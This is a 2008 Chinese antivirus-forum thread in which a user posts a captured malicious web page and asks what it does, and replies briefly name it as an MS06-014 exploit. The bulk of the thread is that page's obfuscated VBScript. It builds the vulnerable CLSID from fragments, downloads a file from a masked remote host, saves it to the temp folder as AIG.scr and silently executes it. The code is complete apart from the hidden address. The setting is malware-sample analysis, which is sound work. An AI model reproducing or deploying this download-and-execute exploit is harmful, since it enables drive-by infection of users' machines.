查看: 5520|回复: 29
收起左侧

[病毒样本] 听说卡饭是国内最强,所以发到此地。

 关闭 [复制链接]
terryyule
发表于 2008-11-18 14:07:18 | 显示全部楼层 |阅读模式
以下是小弟无意中得到的一个马,苦于对代码无知,遂发到卡饭,请各位大侠在空闲时分析下以下代码,并将代码含义写出,万分感谢。

/*
*/
    <html>
    <script language="VBScript">
    on error resume next
    AEEWewhurl = "http://IP/exe1/ms.css"
    AEEWewh="o"&"bj"&"ec"&"t"
    AEEWewh2="c"&"la"&"s"&"si"&"d"
    evil="C"&"5"&"5"&"6"&"-"&"6"&"5"&"A"&"3"&"-"
    evils="c"&"l"&"si"&"d"&":"&"B"&"D9"&"6"
    evilx=evils & evil &"1"&"1"&"D"&"0"&"-"&"9"&"8"&"3"&"A"&"-"&"0"&"0"&"C"&"0"&"4"&"F"&"C"&"2"&"9"&"E"&"3"&"6"
    AEEWewh3="M"&"ic"&"ro"&"so"&"ft"&".X"&"M"&"L"&"HT"&"T"&"P"
    AEEWewh4="Shell.Application"
    AEEWewh5="Sc"&"ri"&"p"&"ti"&"n"&"g.Fi"&"l"&"eSys"&"tem"&"Ob"&"je"&"ct"
    Set evilcute = document.createElement(AEEWewh)
    sub usicecod(AEEWewh4,AEEWewhx)
    set evilcutes = evilcute.createobject(AEEWewh4,"")
    evilcutes.ShellExEcutE evilcutex,"","","o"&"p"&"e"&"n",0
    end sub
    evilcute.setAttribute AEEWewh2, evilx
    chilam=AEEWewh3
    Set wing = evilcute.CreateObject(chilam,"")
    Anhey="A"&"d"&"o"&"d"&"b"&"."
    Anheys="S"&"t"&"r"
    Anheyx="e"&"a"&"m"
    User="andhi"
    Anti = Anhey & Anheys & Anheyx
    Antivirus = Anti
    set Rising = evilcute.createobject(Antivirus,"")
    Rising.type = 1
    Kaspersky="G"&"E"&"T"
    wing.Open Kaspersky, AEEWewhurl, False
    wing.Send
    evilcutex="AIG.scr"
    SeT Virus = evilcute.createobject(AEEWewh5,"")
    sET evilcutes = Virus.GetSpecialFolder(2)
    Rising.open
    evilcutex= Virus.BuildPath(evilcutes,evilcutex)
    Rising.write wing.responseBody
    Rising.savetofile evilcutex,2
    Rising.close
    call usicecod(AEEWewh4,AEEWewhx)
    </script>
    </html>
<script type="text/jscript">function init() { document.write("Loading......");}window.onload = init;</script>
terryyule
 楼主| 发表于 2008-11-18 14:08:10 | 显示全部楼层
等待大侠回复!
will
发表于 2008-11-18 14:30:21 | 显示全部楼层
木马的网址恰好被你隐匿了。。。
tanlimo
发表于 2008-11-18 14:35:10 | 显示全部楼层
不是很明显吗?利用MS06-014漏洞下载http://XXXXXX/exe1/ms.css
sam.to
发表于 2008-11-18 14:38:22 | 显示全部楼层
AEEWewhurl = "http://IP/exe1/ms.css"

怎样下......
terryyule
 楼主| 发表于 2008-11-18 17:19:17 | 显示全部楼层
呵呵  各位别介意  其实IP地址是我故意隐藏的  也算是保护病毒发布者版权 :D

其实我是想求大家帮忙  说一下   这几行代码的作用   而不是分析 http://IP/exe1/ms.css"
jimmyleo
发表于 2008-11-18 17:38:03 | 显示全部楼层
terryyule
 楼主| 发表于 2008-11-18 17:41:48 | 显示全部楼层
楼上地址是正确的  呵呵   希望版主同志写个教程的说
sysfc6
发表于 2008-11-18 17:44:27 | 显示全部楼层
作用,绝密。谢谢
328397663
发表于 2008-11-18 17:48:34 | 显示全部楼层

回复 7楼 jimmyleo 的帖子

2008-11-18 17:48:44        Detected: Trojan-Dropper.Win32.Agent.yjl        C:\Documents and Settings\Administrator\桌面\ms.css/PE_Patch/UPack               
2008-11-18 17:48:50        Deleted: Trojan-Dropper.Win32.Agent.yjl        C:\Documents and Settings\Administrator\桌面\ms.css
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-11-10 01:04 , Processed in 0.109034 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表